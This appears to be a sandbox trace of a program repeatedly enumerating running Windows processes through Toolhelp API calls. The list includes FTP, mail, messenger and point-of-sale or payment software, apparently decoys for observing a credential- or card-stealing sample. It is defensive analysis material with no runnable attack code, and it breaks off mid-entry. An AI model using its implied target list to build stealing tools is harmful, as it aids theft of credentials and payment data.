returned 1 [0237.922] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0237.923] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0237.925] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0237.926] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0237.927] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0237.929] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0237.930] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0237.931] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0237.933] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0237.937] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0237.938] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0237.940] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0237.941] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0237.942] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0237.943] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0237.945] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0237.946] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0237.947] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0237.974] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0237.975] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0237.976] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0237.977] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0237.979] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0237.984] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0237.985] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0237.986] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0237.988] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0237.989] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0237.991] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0237.992] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0237.994] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0237.998] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0237.999] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0238.001] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0238.003] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0238.004] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0238.006] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0238.007] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0238.009] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0238.060] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0238.062] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0238.063] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0238.065] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0238.066] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0238.068] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0238.069] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0238.071] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0238.072] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0238.076] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0238.078] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0238.079] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0238.081] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0238.082] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0238.083] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0238.085] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0238.086] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0238.088] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0238.259] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0238.261] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0238.263] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0238.264] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0238.266] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0238.267] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0238.268] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0238.270] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0238.271] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0238.273] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0238.274] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0238.275] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0238.312] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0238.313] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0238.315] CloseHandle (hObject=0x1b08) returned 1 [0238.315] Sleep (dwMilliseconds=0x64) [0238.856] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b08 [0238.867] Process32First (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0238.868] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0238.871] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0238.875] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0238.877] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0238.878] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0238.880] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0238.881] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0238.883] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0238.884] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.886] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.890] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0238.892] Process32Next (in: 